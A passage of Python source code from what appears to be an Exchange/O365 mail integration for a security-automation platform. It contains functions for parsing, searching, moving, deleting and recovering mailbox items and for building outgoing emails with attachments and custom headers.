:param client: EWS Client
:param last_run: (Optional) last run object
:return: last run dict
"""
if not last_run or last_run.get(LAST_RUN_FOLDER) != client.folder_name:
last_run = {
LAST_RUN_TIME: None,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: [],
}
if LAST_RUN_TIME in last_run and last_run[LAST_RUN_TIME] is not None:
last_run[LAST_RUN_TIME] = EWSDateTime.from_string(last_run[LAST_RUN_TIME])
# In case we have existing last_run data
if last_run.get(LAST_RUN_IDS) is None:
last_run[LAST_RUN_IDS] = []
return last_run
def email_ec(item):
"""
Create entry context for an email
:param item: exchangelib.Item
:return: entry context dict
"""
return {
"CC": None
if not item.cc_recipients
else [mailbox.email_address for mailbox in item.cc_recipients],
"BCC": None
if not item.bcc_recipients
else [mailbox.email_address for mailbox in item.bcc_recipients],
"To": None
if not item.to_recipients
else [mailbox.email_address for mailbox in item.to_recipients],
"From": item.author.email_address,
"Subject": item.subject,
"Text": item.text_body,
"HTML": item.body,
"HeadersMap": {header.name: header.value for header in item.headers},
}
def parse_item_as_dict(item, email_address=None, camel_case=False, compact_fields=False):
"""
Parses an exchangelib item as a dict
:param item: exchangelib.Item to parse
:param (Optional) email_address: string mailbox
:param (Optional) camel_case: Is camel case
:param (Optional) compact_fields: Is compact fields
:return: Item as a dict
"""
def parse_object_as_dict(obj):
raw_dict = {}
if obj is not None:
for field in obj.FIELDS:
raw_dict[field.name] = getattr(obj, field.name, None)
return raw_dict
def parse_folder_as_json(folder):
raw_dict = parse_object_as_dict(folder)
if "parent_folder_id" in raw_dict:
raw_dict["parent_folder_id"] = parse_folder_as_json(
raw_dict["parent_folder_id"]
)
if "effective_rights" in raw_dict:
raw_dict["effective_rights"] = parse_object_as_dict(
raw_dict["effective_rights"]
)
return raw_dict
raw_dict = {}
for field, value in item._field_vals():
if type(value) in [str, str, int, float, bool, Body, HTMLBody, None]:
raw_dict[field] = value
raw_dict["id"] = item.id
if getattr(item, "attachments", None):
raw_dict["attachments"] = [
parse_attachment_as_dict(item.id, x) for x in item.attachments
]
for time_field in [
"datetime_sent",
"datetime_created",
"datetime_received",
"last_modified_time",
"reminder_due_by",
]:
value = getattr(item, time_field, None)
if value:
raw_dict[time_field] = value.ewsformat()
for dict_field in [
"effective_rights",
"parent_folder_id",
"conversation_id",
"author",
"extern_id",
"received_by",
"received_representing",
"reply_to",
"sender",
"folder",
]:
value = getattr(item, dict_field, None)
if value:
if isinstance(value, list):
raw_dict[dict_field] = []
for single_val in value:
raw_dict[dict_field].append(parse_object_as_dict(single_val))
else:
raw_dict[dict_field] = parse_object_as_dict(value)
for list_dict_field in ["headers", "cc_recipients", "to_recipients"]:
value = getattr(item, list_dict_field, None)
if value:
raw_dict[list_dict_field] = [parse_object_as_dict(x) for x in value]
if getattr(item, "folder", None):
raw_dict["folder"] = parse_folder_as_json(item.folder)
folder_path = (
item.folder.absolute[len(TOIS_PATH):]
if item.folder.absolute.startswith(TOIS_PATH)
else item.folder.absolute
)
raw_dict["folder_path"] = folder_path
if compact_fields:
new_dict = {}
# noinspection PyListCreation
fields_list = [
"datetime_created",
"datetime_received",
"datetime_sent",
"sender",
"has_attachments",
"importance",
"message_id",
"last_modified_time",
"size",
"subject",
"text_body",
"headers",
"body",
"folder_path",
"is_read",
]
if "id" in raw_dict:
new_dict["itemId"] = raw_dict["id"]
fields_list.append("itemId")
for field in fields_list:
if field in raw_dict:
new_dict[field] = raw_dict.get(field)
for field in ["received_by", "author", "sender"]:
if field in raw_dict:
new_dict[field] = raw_dict.get(field, {}).get("email_address")
for field in ["to_recipients"]:
if field in raw_dict:
new_dict[field] = [x.get("email_address") for x in raw_dict[field]]
attachments = raw_dict.get("attachments")
if attachments and len(attachments) > 0:
file_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == FILE_ATTACHMENT_TYPE
]
if len(file_attachments) > 0:
new_dict["FileAttachments"] = file_attachments
item_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == ITEM_ATTACHMENT_TYPE
]
if len(item_attachments) > 0:
new_dict["ItemAttachments"] = item_attachments
raw_dict = new_dict
if camel_case:
raw_dict = keys_to_camel_case(raw_dict)
if email_address:
raw_dict[MAILBOX] = email_address
return raw_dict
def get_entry_for_file_attachment(item_id, attachment):
"""
Creates a file entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: file entry dict for attachment
"""
entry = fileResult(get_attachment_name(attachment.name), attachment.content)
entry["EntryContext"] = {
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT
+ CONTEXT_UPDATE_FILE_ATTACHMENT: parse_attachment_as_dict(item_id, attachment)
}
return entry
def parse_attachment_as_dict(item_id, attachment):
"""
Creates a note entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: note entry dict for attachment
"""
try:
attachment_content = (
attachment.content
if isinstance(attachment, FileAttachment)
else attachment.item.mime_content
)
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": hashlib.sha256(attachment_content).hexdigest()
if attachment_content
else None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
def get_entry_for_item_attachment(item_id, attachment, target_email):
"""
Creates a note entry for an item attachment
:param item_id: Item id
:param attachment: exchangelib attachment
:param target_email: target email
:return: note entry dict for item attachment
"""
item = attachment.item
dict_result = parse_attachment_as_dict(item_id, attachment)
dict_result.update(
parse_item_as_dict(item, target_email, camel_case=True, compact_fields=True)
)
title = f'EWS get attachment got item for "{target_email}", "{get_attachment_name(attachment.name)}"'
return get_entry_for_object(
title,
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT + CONTEXT_UPDATE_ITEM_ATTACHMENT,
dict_result,
)
""" Command Functions """
def get_expanded_group(client: EWSClient, email_address, recursive_expansion=False):
"""
Retrieve expanded group command
:param client: EWS Client
:param email_address: Email address of the group to expand
:param (Optional) recursive_expansion: Whether to enable recursive expansion. Default is "False".
:return: Expanded groups output tuple
"""
group_members = ExpandGroup(protocol=client.protocol).call(
email_address, recursive_expansion
)
group_details = {"name": email_address, "members": group_members}
output = {"EWS.ExpandGroup": group_details}
readable_output = tableToMarkdown("Group Members", group_members)
return readable_output, output, group_details
def get_searchable_mailboxes(client: EWSClient):
"""
Retrieve searchable mailboxes command
:param client: EWS Client
:return: Searchable mailboxes output tuple
"""
searchable_mailboxes = GetSearchableMailboxes(protocol=client.protocol).call()
readable_output = tableToMarkdown(
"Searchable mailboxes", searchable_mailboxes, headers=["displayName", "mailbox"]
)
output = {"EWS.Mailboxes": searchable_mailboxes}
return readable_output, output, searchable_mailboxes
def delete_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Deletes attachments for a given message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids to delete
:return: entries that were delted
"""
attachments = client.get_attachments_for_item(
item_id, target_mailbox, attachment_ids
)
deleted_file_attachments = []
deleted_item_attachments = [] # type: ignore
for attachment in attachments:
attachment_deleted_action = {
ATTACHMENT_ID: attachment.attachment_id.id,
ACTION: "deleted",
}
if isinstance(attachment, FileAttachment):
deleted_file_attachments.append(attachment_deleted_action)
else:
deleted_item_attachments.append(attachment_deleted_action)
attachment.detach()
entries = []
if len(deleted_file_attachments) > 0:
entry = get_entry_for_object(
"Deleted file attachments",
"EWS.Items" + CONTEXT_UPDATE_FILE_ATTACHMENT,
deleted_file_attachments,
)
entries.append(entry)
if len(deleted_item_attachments) > 0:
entry = get_entry_for_object(
"Deleted item attachments",
"EWS.Items" + CONTEXT_UPDATE_ITEM_ATTACHMENT,
deleted_item_attachments,
)
entries.append(entry)
return entries
def fetch_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Fetches attachments for a message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids
:return: list of parsed entries
"""
account = client.get_account(target_mailbox)
attachments = client.get_attachments_for_item(item_id, account, attachment_ids)
entries = []
for attachment in attachments:
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
entries.append(get_entry_for_file_attachment(item_id, attachment))
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
else:
entries.append(
get_entry_for_item_attachment(
item_id, attachment, account.primary_smtp_address
)
)
if attachment.item.mime_content:
entries.append(
fileResult(
get_attachment_name(attachment.name) + ".eml",
attachment.item.mime_content,
)
)
return entries
def move_item_between_mailboxes(
client: EWSClient,
item_id,
destination_mailbox,
destination_folder_path,
source_mailbox=None,
is_public=None,
):
"""
Moves item between mailboxes
:param client: EWS Client
:param item_id: item id
:param destination_mailbox: destination mailbox
:param destination_folder_path: destination folder path
:param (Optional) source_mailbox: source mailbox
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
source_account = client.get_account(source_mailbox)
destination_account = client.get_account(destination_mailbox)
is_public = client.is_default_folder(destination_folder_path, is_public)
destination_folder = client.get_folder_by_path(
destination_folder_path, destination_account, is_public
)
item = client.get_item_from_mailbox(source_account, item_id)
exported_items = source_account.export([item])
destination_account.upload([(destination_folder, exported_items[0])])
source_account.bulk_delete([item])
move_result = {
MOVED_TO_MAILBOX: destination_mailbox,
MOVED_TO_FOLDER: destination_folder_path,
}
readable_output = "Item was moved successfully."
output = {f"EWS.Items(val.itemId === '{item_id}')": move_result}
return readable_output, output, move_result
def move_item(
client: EWSClient, item_id, target_folder_path, target_mailbox=None, is_public=None
):
"""
Moves an item within the same mailbox
:param client: EWS Client
:param item_id: item id
:param target_folder_path: target folder path
:param (Optional) target_mailbox: mailbox containing the item
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, is_public=is_public)
item = client.get_item_from_mailbox(account, item_id)
if isinstance(item, ErrorInvalidIdMalformed):
raise Exception("Item not found")
item.move(target_folder)
move_result = {
NEW_ITEM_ID: item.id,
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: "moved",
}
readable_output = tableToMarkdown("Moved items", move_result)
output = {CONTEXT_UPDATE_EWS_ITEM: move_result}
return readable_output, output, move_result
def delete_items(client: EWSClient, item_ids, delete_type, target_mailbox=None):
"""
Delete items in a mailbox
:param client: EWS Client
:param item_ids: items ids to delete
:param delete_type: delte type soft/hard
:param (Optional) target_mailbox: mailbox containinf the items
:return: Output tuple
"""
deleted_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
delete_type = delete_type.lower()
for item in items:
item_id = item.id
if delete_type == "trash":
item.move_to_trash()
elif delete_type == "soft":
item.soft_delete()
elif delete_type == "hard":
item.delete()
else:
raise Exception(
f'invalid delete type: {delete_type}. Use "trash" \\ "soft" \\ "hard"'
)
deleted_items.append(
{
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: f"{delete_type}-deleted",
}
)
readable_output = tableToMarkdown(
f"Deleted items ({delete_type} delete type)", deleted_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: deleted_items}
return readable_output, output, deleted_items
def search_items_in_mailbox(
client: EWSClient,
query=None,
message_id=None,
folder_path="",
limit=100,
target_mailbox=None,
is_public=None,
selected_fields="all",
):
"""
Search items in mailbox
:param client: EWS Client
:param (Optional) query: query to execute
:param (Optional) message_id: message ids to search
:param (Optional) folder_path: folder path to search
:param (Optional) limit: max amount of items to fetch
:param (Optional) target_mailbox: mailbox containing the items
:param (Optional) is_public: is the targeted folder public
:param (Optional) selected_fields: Selected fields
:return: Output tuple
"""
if not query and not message_id:
return_error("Missing required argument. Provide query or message-id")
if message_id and message_id[0] != "<" and message_id[-1] != ">":
message_id = "<{}>".format(message_id)
account = client.get_account(target_mailbox)
limit = int(limit)
if folder_path.lower() == "inbox":
folders = [account.inbox]
elif folder_path:
is_public = client.is_default_folder(folder_path, is_public)
folders = [client.get_folder_by_path(folder_path, account, is_public)]
else:
folders = account.inbox.parent.walk() # pylint: disable=E1101
items = [] # type: ignore
selected_all_fields = selected_fields == "all"
if selected_all_fields:
restricted_fields = list([x.name for x in Message.FIELDS]) # type: ignore
else:
restricted_fields = set(argToList(selected_fields)) # type: ignore
restricted_fields.update(["id", "message_id"]) # type: ignore
for folder in folders:
if Message not in folder.supported_item_models:
continue
if query:
items_qs = folder.filter(query).only(*restricted_fields)
else:
items_qs = folder.filter(message_id=message_id).only(*restricted_fields)
items += get_limited_number_of_messages_from_qs(items_qs, limit)
if len(items) >= limit:
break
items = items[:limit]
searched_items_result = [
parse_item_as_dict(
item,
account.primary_smtp_address,
camel_case=True,
compact_fields=selected_all_fields,
)
for item in items
]
if not selected_all_fields:
searched_items_result = [
{k: v for (k, v) in i.items() if k in keys_to_camel_case(restricted_fields)}
for i in searched_items_result
]
for item in searched_items_result:
item["itemId"] = item.pop("id", "")
readable_output = tableToMarkdown(
"Searched items",
searched_items_result,
headers=ITEMS_RESULTS_HEADERS if selected_all_fields else None,
)
output = {CONTEXT_UPDATE_EWS_ITEM: searched_items_result}
return readable_output, output, searched_items_result
def get_out_of_office_state(client: EWSClient, target_mailbox=None):
"""
Retrieve get out of office state of the targeted mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
oof = account.oof_settings
oof_dict = {
"state": oof.state, # pylint: disable=E1101
"externalAudience": getattr(oof, "external_audience", None),
"start": oof.start.ewsformat() if oof.start else None, # pylint: disable=E1101
"end": oof.end.ewsformat() if oof.end else None, # pylint: disable=E1101
"internalReply": getattr(oof, "internal_replay", None),
"externalReply": getattr(oof, "external_replay", None),
MAILBOX: account.primary_smtp_address,
}
readable_output = tableToMarkdown(
f"Out of office state for {account.primary_smtp_address}", oof_dict
)
output = {f"Account.Email(val.Address == obj.{MAILBOX}).OutOfOffice": oof_dict}
return readable_output, output, oof_dict
def recover_soft_delete_item(
client: EWSClient,
message_ids,
target_folder_path="Inbox",
target_mailbox=None,
is_public=None,
):
"""
Recovers soft deleted items
:param client: EWS Client
:param message_ids: Message ids to recover
:param (Optional) target_folder_path: target folder path
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the target folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, account, is_public)
recovered_messages = []
message_ids = argToList(message_ids)
items_to_recover = account.recoverable_items_deletions.filter( # pylint: disable=E1101
message_id__in=message_ids
).all() # pylint: disable=E1101
recovered_items = set()
for item in items_to_recover:
recovered_items.add(item)
if len(recovered_items) != len(message_ids):
missing_items = set(message_ids).difference(recovered_items)
raise Exception(
f"Some message ids are missing in recoverable items directory: {missing_items}"
)
for item in recovered_items:
item.move(target_folder)
recovered_messages.append(
{ITEM_ID: item.id, MESSAGE_ID: item.message_id, ACTION: "recovered"}
)
readable_output = tableToMarkdown("Recovered messages", recovered_messages)
output = {CONTEXT_UPDATE_EWS_ITEM: recovered_messages}
return readable_output, output, recovered_messages
def get_contacts(client: EWSClient, limit, target_mailbox=None):
"""
Retrieve contacts of the target mailbox or client mailbox
:param client: EWS Client
:param limit: max amount of contacts to retrieve
:param (Optional) target_mailbox: Target mailbox
:return:
"""
def parse_physical_address(address):
result = {}
for attr in ["city", "country", "label", "state", "street", "zipcode"]:
result[attr] = getattr(address, attr, None)
return result
def parse_phone_number(phone_number):
result = {}
for attr in ["label", "phone_number"]:
result[attr] = getattr(phone_number, attr, None)
return result
def parse_contact(contact):
contact_dict = dict(
(k, v if not isinstance(v, EWSDateTime) else v.ewsformat())
for k, v in list(contact._field_vals())
if isinstance(v, str) or isinstance(v, EWSDateTime)
)
if isinstance(contact, Contact) and contact.physical_addresses:
contact_dict["physical_addresses"] = list(
map(parse_physical_address, contact.physical_addresses)
)
if isinstance(contact, Contact) and contact.phone_numbers:
contact_dict["phone_numbers"] = list(
map(parse_phone_number, contact.phone_numbers)
)
if (
isinstance(contact, Contact)
and contact.email_addresses
and len(contact.email_addresses) > 0
):
contact_dict["emailAddresses"] = [x.email for x in contact.email_addresses]
contact_dict = keys_to_camel_case(contact_dict)
contact_dict = dict((k, v) for k, v in list(contact_dict.items()) if v)
contact_dict.pop("mimeContent", None)
contact_dict["originMailbox"] = target_mailbox
return contact_dict
account = client.get_account(target_mailbox)
contacts = []
for contact in account.contacts.all()[: int(limit)]: # pylint: disable=E1101
contacts.append(parse_contact(contact))
readable_output = tableToMarkdown(f"Email contacts for {target_mailbox}", contacts)
output = {"Account.Email(val.Address == obj.originMailbox).EwsContacts": contacts}
return readable_output, output, contacts
def create_folder(client: EWSClient, new_folder_name, folder_path, target_mailbox=None):
"""
Creates a folder in the target mailbox or the client mailbox
:param client: EWS Client
:param new_folder_name: new folder name
:param folder_path: path of the new folder
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
full_path = os.path.join(folder_path, new_folder_name)
try:
if client.get_folder_by_path(full_path, account):
return f"Folder {full_path} already exists",
except Exception:
pass
parent_folder = client.get_folder_by_path(folder_path, account)
f = Folder(parent=parent_folder, name=new_folder_name)
f.save()
client.get_folder_by_path(full_path, account)
return f"Folder {full_path} created successfully",
def find_folders(client: EWSClient, target_mailbox=None):
"""
Finds folders in the mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
root = account.root
if client.is_public_folder:
root = account.public_folders_root
folders = []
for f in root.walk(): # pylint: disable=E1101
folder = folder_to_context_entry(f)
folders.append(folder)
folders_tree = root.tree() # pylint: disable=E1101
readable_output = folders_tree
output = {"EWS.Folders(val.id == obj.id)": folders}
return readable_output, output, folders
def mark_item_as_junk(client: EWSClient, item_id, move_items, target_mailbox=None):
"""
Marks item as junk in the target mailbox or client mailbox
:param client: EWS Client
:param item_id: item ids to mark as junk
:param move_items: "yes" or "no" - to move or not to move to trash
:param (Optional) target_mailbox: target mailbox
:return:
"""
account = client.get_account(target_mailbox)
move_items = move_items.lower() == "yes"
ews_result = MarkAsJunk(account=account).call(item_id=item_id, move_item=move_items)
mark_as_junk_result = {
ITEM_ID: item_id,
}
if ews_result == "Success":
mark_as_junk_result[ACTION] = "marked-as-junk"
else:
raise Exception("Failed mark-item-as-junk with error: " + ews_result)
readable_output = tableToMarkdown("Mark item as junk", mark_as_junk_result)
output = {CONTEXT_UPDATE_EWS_ITEM: mark_as_junk_result}
return readable_output, output, mark_as_junk_result
def get_items_from_folder(
client: EWSClient,
folder_path,
limit=100,
target_mailbox=None,
is_public=None,
get_internal_item="no",
):
"""
Retrieve items from folder path
:param client: EWS Client
:param folder_path: folder path
:param (Optional) limit: max amount of items to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:param (Optional) get_internal_item: should also retrieve internal items ("no" by default)
:return: Output tuple
"""
account = client.get_account(target_mailbox)
limit = int(limit)
get_internal_item = get_internal_item == "yes"
is_public = client.is_default_folder(folder_path, is_public)
folder = client.get_folder_by_path(folder_path, account, is_public)
qs = folder.filter().order_by("-datetime_created")[:limit]
items = get_limited_number_of_messages_from_qs(qs, limit)
items_result = []
for item in items:
item_attachment = parse_item_as_dict(
item, account.primary_smtp_address, camel_case=True, compact_fields=True
)
for attachment in item.attachments:
if (
get_internal_item
and isinstance(attachment, ItemAttachment)
and isinstance(attachment.item, Message)
):
# if found item attachment - switch item to the attchment
item_attachment = parse_item_as_dict(
attachment.item,
account.primary_smtp_address,
camel_case=True,
compact_fields=True,
)
break
items_result.append(item_attachment)
hm_headers = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"itemId",
]
readable_output = tableToMarkdown(
"Items in folder " + folder_path, items_result, headers=hm_headers
)
output = {CONTEXT_UPDATE_EWS_ITEM: items_result}
return readable_output, output, items_result
def get_items(client: EWSClient, item_ids, target_mailbox=None):
"""
Get items from target mailbox or client mailbox
:param client: EWS Client
:param item_ids: item ids to retrieve
:param (Optional) target_mailbox: target mailbox to retrieve items from
:return:
"""
item_ids = argToList(item_ids)
account = client.get_account(target_mailbox)
items = client.get_items_from_mailbox(account, item_ids)
items = [x for x in items if isinstance(x, Message)]
items_as_incidents = [parse_incident_from_item(x) for x in items]
items_to_context = [
parse_item_as_dict(x, account.primary_smtp_address, True, True) for x in items
]
readable_output = tableToMarkdown(
"Get items", items_to_context, ITEMS_RESULTS_HEADERS
)
output = {
CONTEXT_UPDATE_EWS_ITEM: items_to_context,
"Email": [email_ec(item) for item in items],
}
return readable_output, output, items_as_incidents
def get_folder(client: EWSClient, folder_path, target_mailbox=None, is_public=None):
"""
Retrieve a folder from the target mailbox or client mailbox
:param client: EWS Client
:param folder_path: folder path to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(folder_path, is_public)
folder = folder_to_context_entry(
client.get_folder_by_path(folder_path, account=account, is_public=is_public)
)
readable_output = tableToMarkdown(f"Folder {folder_path}", folder)
output = {CONTEXT_UPDATE_FOLDER: folder}
return readable_output, output, folder
def folder_to_context_entry(f):
"""
Create a context entry from a folder response
:param f: folder response
:return: dict context entry
"""
try:
f_entry = {
"name": f.name,
"totalCount": f.total_count,
"id": f.id,
"childrenFolderCount": f.child_folder_count,
"changeKey": f.changekey,
}
if "unread_count" in [x.name for x in Folder.FIELDS]:
f_entry["unreadCount"] = f.unread_count
return f_entry
except AttributeError:
if isinstance(f, dict):
return {
"name": f.get("name"),
"totalCount": f.get("total_count"),
"id": f.get("id"),
"childrenFolderCount": f.get("child_folder_count"),
"changeKey": f.get("changekey"),
"unreadCount": f.get("unread_count"),
}
def mark_item_as_read(
client: EWSClient, item_ids, operation="read", target_mailbox=None
):
"""
Marks item as read
:param client: EWS Client
:param item_ids: items ids to mark as read
:param (Optional) operation: operation to execute
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
marked_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
items = [x for x in items if isinstance(x, Message)]
for item in items:
item.is_read = operation == "read"
item.save()
marked_items.append(
{
ITEM_ID: item.id,
MESSAGE_ID: item.message_id,
ACTION: "marked-as-{}".format(operation),
}
)
readable_output = tableToMarkdown(
f"Marked items ({operation} marked operation)", marked_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: marked_items}
return readable_output, output, marked_items
def random_word_generator(length):
"""Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
Due to security implications, we support only images here
We might not have Beautiful Soup so just do regex search
"""
attachments = []
clean_body = ''
last_index = 0
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image\/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
attachment = {
'data': base64.b64decode(m.group(3)),
'name': f'image{i}'
}
attachment['cid'] = f'{attachment["name"]}@{random_word_generator(8)}.{random_word_generator(8)}'
attachments.append(attachment)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + attachment['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
def collect_manual_attachments(manualAttachObj):
"""Collect all manual attachments' data
Args:
manualAttachObj (str): String representation of the manually attached files list.
Returns:
List[Dict]. List of the files data.
"""
manually_attached_objects = argToList(manualAttachObj)
attachments = []
for attachment in manually_attached_objects:
file_res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = file_res['path']
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'data': data,
'cid': ''
})
return attachments
def collect_attachments(attachments_ids, attachments_cids, attachments_names):
"""Collect all attachments' data
Args:
attachments_ids (str): String representation of the files ids list.
attachments_cids (str): String representation of the files content ids list.
attachments_names (str): String representation of the files names list.
Returns:
List[Dict]. List of the files data.
"""
attachments = []
files_ids = argToList(attachments_ids)
files_cids = argToList(attachments_cids)
files_names = argToList(attachments_names)
for index, file_id in enumerate(files_ids):
try:
file_res = demisto.getFilePath(file_id)
path = file_res['path']
if len(files_names) > index and files_names[index]:
filename = files_names[index]
else:
filename = file_res['name']
if len(files_cids) > index and files_cids[index]:
cid = files_cids[index]
else:
cid = ''
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'data': data,
'cid': cid
})
except Exception as e:
demisto.error(f'Invalid entry {file_id} with exception: {e}')
return_error(f'Entry {file_id} is not valid or is not a file entry')
return attachments
def handle_transient_files(transient_files, transient_files_contents, transient_files_cids):
"""Creates the transient attachments data
Args:
transient_files (str): String representation of the transient files names list.
transient_files_contents (str): String representation of the transient files content list.
transient_files_cids (str): String representation of the transient files content ids list.
Returns:
List[Dict]. List of the transient files data.
"""
transient_attachments = []
files_names = argToList(transient_files)
files_contents = argToList(transient_files_contents)
files_cids = argToList(transient_files_cids)
for index in range(len(files_names)):
file_name = files_names[index]
if index >= len(files_contents):
break
file_content = bytes(files_contents[index], UTF_8)
if index >= len(files_cids):
file_cid = ''
else:
file_cid = files_cids[index]
transient_attachments.append({
'name': file_name,
'data': file_content,
'cid': file_cid
})
return transient_attachments
def handle_template_params(template_params):
"""Translates the template params if they exist from the context
Args:
template_params (str): JSON string that represent the variables names to be replaced and the desired value.
Value can be either real value or context key to fetch the value from.
Returns:
Dict. `variable_name: value_to_use` of the templated parameters.
"""
actual_params = {}
if template_params:
try:
params = json.loads(template_params)
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
except ValueError as e:
return_error('Unable to parse template_params: %s' % (str(e)))
return actual_params
def create_message_object(to, cc, bcc, subject, body, additional_headers):
"""Creates the message object according to the existence of additional custom headers.
"""
if additional_headers:
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body,
**additional_headers
)
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body
)
def create_message(to, subject='', body='', bcc=None, cc=None, html_body=None, attachments=None,
additional_headers=None):
"""Creates the Message object that will be sent.
Args:
to (list): Main recipients.
cc (list): CC recipients.
bcc (list): BCC recipients.
subject (str): Email's subject.
body (str): Email's simple text body.
html_body (str): Email's html body.
attachments (list): Files to be attached to the mail, both inline and as files.
additional_headers (Dict): Custom headers to be added to the message.
Returns:
Message. Message object ready to be sent.
"""
if not html_body:
# This is a simple text message - we cannot have CIDs here
message = create_message_object(to, cc, bcc, subject, body, additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
message.attach(new_attachment)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
message = create_message_object(to, cc, bcc, subject, HTMLBody(html_body), additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
else:
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'),
is_inline=True, content_id=attachment.get('cid'))
message.attach(new_attachment)
return message
def add_additional_headers(additional_headers):
"""Adds custom headers to the Message object
Args:
additional_headers (str): Headers list as string. Example: headerName1=headerValue1,headerName2=headerValue2
Returns:
Dict. Headers dictionary in the form of: `header_name: header value`
"""
headers = dict()
for header in argToList(additional_headers):
header_name, header_value = header.split('=', 1)
class TempClass(ExtendedProperty):
distinguished_property_set_id = 'InternetHeaders'
property_name = header_name
property_type = 'String'
try:
Message.register(header_name, TempClass)
headers[header_name] = header_value
except ValueError as e:
demisto.debug('EWSO365 - Header ' + header_name + ' could not be registered. ' + str(e))
return headers
def send_email(client: EWSClient, to, subject='', body="", bcc=None, cc=None, htmlBody=None,
attachIDs="", attachCIDs="", attachNames="", manualAttachObj=None,
transientFile=None, transientFileContent=None, transientFileCID=None, templateParams=None,
additionalHeader=None, raw_message=None):
to = argToList(to)
cc = argToList(cc)
bcc = argToList(bcc)
# Basic validation - we allow pretty much everything but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error('You must have at least one recipient')
if raw_message:
message = Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
body=raw_message
)
else:
if additionalHeader:
additionalHeader = add_additional_headers(additionalHeader)
# collect all types of attachments
attachments = collect_attachments(attachIDs, attachCIDs, attachNames)
attachments.extend(collect_manual_attachments(manualAttachObj))
attachments.extend(handle_transient_files(transientFile, transientFileContent, transientFileCID))
# update body and html_body with the templated params, if exists
